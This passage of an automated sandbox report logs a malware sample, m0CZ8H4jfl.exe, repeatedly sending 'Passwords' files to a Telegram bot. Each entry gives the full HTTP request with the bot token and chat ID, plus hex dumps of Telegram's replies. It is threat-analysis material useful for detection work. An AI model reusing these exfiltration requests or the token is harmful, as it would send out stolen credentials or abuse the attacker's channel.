                                                                                                        2025-01-10 18:57:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44625,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535429,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.950022149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:10 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd332704d874a7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:10 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 37 30 34 64 38 37 34 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd332704d874a7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:10 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44626,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535430,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.950024149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:12 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd333e80865cbd
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 65 38 30 38 36 35 63 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd333e80865cbdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:12 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:12 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44627,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535432,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.950026149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:14 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33534ee742fc
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 33 34 65 65 37 34 32 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33534ee742fcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:14 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:14 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:14 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44628,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535434,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.950028149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:15 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33695988c9e0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 39 35 39 38 38 63 39 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33695988c9e0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:16 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:16 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:16 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44629,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535436,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.950030149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:17 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd338331fbf071
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 33 33 31 66 62 66 30 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd338331fbf071Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:17 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 535
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:17 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44630,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535437,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.950032149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:19 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3399184f1d9f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 39 31 38 34 66 31 64 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3399184f1d9fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:19 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:19 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:19 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44631,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535439,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.950034149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:20 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33b17f5f6303
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 31 37 66 35 66 36 33 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33b17f5f6303Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:21 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:21 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
